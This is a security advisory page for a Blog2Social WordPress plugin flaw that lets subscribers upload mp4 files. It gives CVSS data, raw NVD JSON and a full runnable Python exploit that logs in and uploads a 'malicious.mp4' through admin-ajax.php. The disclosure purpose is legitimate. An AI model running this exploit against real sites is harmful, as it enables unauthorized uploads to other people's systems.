Security Vulnerability Report
CVE-2025-12563 CVSS 4.3 MEDIUM

CVE-2025-12563

Published: 2025-11-06 05:16:05
Last Modified: 2026-04-15 00:35:42

Description

The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to limited file upload due to an incorrect capability check on the uploadVideo() function in all versions up to, and including, 8.6.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload mp4 files to the 'wp-content/uploads/<YYYY>/<MM>/' directory.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Blog2Social < 8.6.1 (all versions 8.6.0 and below)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-12563 PoC - Blog2Social Plugin File Upload Vulnerability
Affected: Blog2Social <= 8.6.0
Type: Incorrect Capability Check leading to Limited File Upload
"""

import requests
import sys
from urllib.parse import urljoin


def exploit_cve_2025_12563(target_url, username, password, mp4_file_path):
    """
    Exploit for Blog2Social uploadVideo() function privilege escalation

    Requirements:
    - Valid WordPress subscriber+ account
    - MP4 file to upload
    """
    # Setup session
    session = requests.Session()

    # Login to WordPress
    login_url = urljoin(target_url, '/wp-login.php')
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }

    print(f'[*] Logging in as {username}...')
    response = session.post(login_url, data=login_data, allow_redirects=True)

    if 'wordpress_logged_in' not in str(session.cookies):
        print('[-] Login failed!')
        return False

    print('[+] Login successful!')

    # Prepare MP4 file upload
    upload_url = urljoin(target_url, '/wp-admin/admin-ajax.php')

    with open(mp4_file_path, 'rb') as f:
        mp4_content = f.read()

    # Construct multipart form data for uploadVideo()
    files = {
        'file': ('malicious.mp4', mp4_content, 'video/mp4'),
    }
    data = {
        'action': 'b2s_upload_video',
        'post_id': '0'
    }

    print(f'[*] Uploading MP4 file to {target_url}...')
    response = session.post(upload_url, data=data, files=files)

    if response.status_code == 200:
        result = response.json() if response.headers.get('content-type', '').find('json') != -1 else {}
        if result.get('success') or 'url' in result:
            upload_url = result.get('url', 'Unknown')
            print(f'[+] File uploaded successfully!')
            print(f'[+] File URL: {upload_url}')
            return True
        elif 'error' in result:
            print(f'[-] Upload failed: {result["error"]}')
            return False

    print(f'[*] Response: {response.status_code}')
    print(f'[*] Response body: {response.text[:500]}')
    return False


if __name__ == '__main__':
    if len(sys.argv) < 5:
        print('Usage: python cve-2025-12563.py <target_url> <username> <password> <mp4_file>')
        print('Example: python cve-2025-12563.py http://example.com/ attacker password malicious.mp4')
        sys.exit(1)

    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    mp4 = sys.argv[4]

    exploit_cve_2025_12563(target, user, pwd, mp4)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12563", "sourceIdentifier": "[email protected]", "published": "2025-11-06T05:16:05.130", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to limited file upload due to an incorrect capability check on theuploadVideo() function in all versions up to, and including, 8.6.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload mp4 files to the 'wp-content/uploads/<YYYY>/<MM>/' directory."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3389636/blog2social", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3710f139-0f17-426c-b48c-4c42ae4bab5f?source=cve", "source": "[email protected]"}]}}